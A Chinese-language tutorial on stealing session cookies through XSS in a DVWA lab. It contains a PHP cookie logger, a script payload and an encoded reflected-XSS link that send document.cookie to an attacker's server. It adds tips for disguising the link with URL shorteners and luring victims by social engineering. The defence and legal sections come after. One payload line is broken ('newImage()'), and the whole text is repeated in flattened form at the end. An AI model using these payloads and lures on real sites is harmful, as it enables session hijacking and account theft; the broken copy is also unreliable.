利用XSS漏洞获取对方cookie(测试通过20190908)
字数 865 2025-08-18 11:38:56

XSS漏洞利用:获取对方Cookie的完整指南

1. 环境准备

1.1 所需系统及IP配置

  • 攻击机:Kali Linux (192.168.80.136)
  • 目标机1:Windows 7 (192.168.80.130)
  • 目标机2:Metasploitable (192.168.80.129) - 运行DVWA(Damn Vulnerable Web Application)

1.2 工具准备

  • Web服务器(Apache/Nginx) - 用于托管cookie接收脚本
  • 文本编辑器 - 用于编写和查看脚本

2. Cookie接收脚本设置

2.1 脚本内容

<?php
$ck = $_GET['cookie'];
error_log("$ck\n", 3, "cookie.txt");
?>

2.2 部署步骤

  1. 将脚本保存为get.php
  2. 放置在Kali Linux的/var/www/html目录下
  3. 设置目录权限:
    chmod 777 /var/www/html
    

3. XSS漏洞利用过程

3.1 漏洞利用代码

<script>newImage().src="http://192.168.80.136/get.php?cookie="+document.cookie;</script>

3.2 攻击步骤

  1. 目标用户登录DVWA
  2. 访问存在XSS漏洞的页面
  3. 在输入框中提交上述JavaScript代码
  4. 提交后,代码会自动执行,将用户的cookie发送到攻击者的服务器

4. 结果查看

在Kali Linux上查看获取的cookie:

cat /var/www/html/cookie.txt

5. 高级利用技巧

5.1 URL伪装

原始攻击URL示例:

http://192.168.80.129/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Enew+Image%28%29.src%3D%22http%3A%2F%2F192.168.80.136%2Fget.php%3Fcookie%3D%22%2Bdocument.cookie%3B%3C%2Fscript%3E#

伪装方法:

  1. 使用URL缩短服务
  2. 将链接嵌入图片或其他看似无害的元素中
  3. 通过社交工程诱使用户点击

5.2 攻击条件

  • 目标用户必须已登录目标网站(DVWA)
  • 目标网站存在存储型或反射型XSS漏洞
  • 目标用户的浏览器未启用严格的CSP(Content Security Policy)

6. 防御措施

6.1 对开发者的建议

  1. 对所有用户输入进行过滤和转义
  2. 设置HttpOnly标志的cookie
  3. 实施CSP策略
  4. 使用X-XSS-Protection头

6.2 对用户的建议

  1. 保持浏览器更新
  2. 使用XSS防护插件
  3. 不点击可疑链接
  4. 定期清除cookie

7. 法律与道德声明

本教程仅用于教育目的和安全研究,未经授权对他人系统进行测试或攻击是违法行为。进行安全测试前必须获得系统所有者的明确许可。

XSS漏洞利用:获取对方Cookie的完整指南 1. 环境准备 1.1 所需系统及IP配置 攻击机 :Kali Linux (192.168.80.136) 目标机1 :Windows 7 (192.168.80.130) 目标机2 :Metasploitable (192.168.80.129) - 运行DVWA(Damn Vulnerable Web Application) 1.2 工具准备 Web服务器(Apache/Nginx) - 用于托管cookie接收脚本 文本编辑器 - 用于编写和查看脚本 2. Cookie接收脚本设置 2.1 脚本内容 2.2 部署步骤 将脚本保存为 get.php 放置在Kali Linux的 /var/www/html 目录下 设置目录权限: 3. XSS漏洞利用过程 3.1 漏洞利用代码 3.2 攻击步骤 目标用户登录DVWA 访问存在XSS漏洞的页面 在输入框中提交上述JavaScript代码 提交后,代码会自动执行,将用户的cookie发送到攻击者的服务器 4. 结果查看 在Kali Linux上查看获取的cookie: 5. 高级利用技巧 5.1 URL伪装 原始攻击URL示例: 伪装方法: 使用URL缩短服务 将链接嵌入图片或其他看似无害的元素中 通过社交工程诱使用户点击 5.2 攻击条件 目标用户必须已登录目标网站(DVWA) 目标网站存在存储型或反射型XSS漏洞 目标用户的浏览器未启用严格的CSP(Content Security Policy) 6. 防御措施 6.1 对开发者的建议 对所有用户输入进行过滤和转义 设置HttpOnly标志的cookie 实施CSP策略 使用X-XSS-Protection头 6.2 对用户的建议 保持浏览器更新 使用XSS防护插件 不点击可疑链接 定期清除cookie 7. 法律与道德声明 本教程仅用于教育目的和安全研究,未经授权对他人系统进行测试或攻击是违法行为。进行安全测试前必须获得系统所有者的明确许可。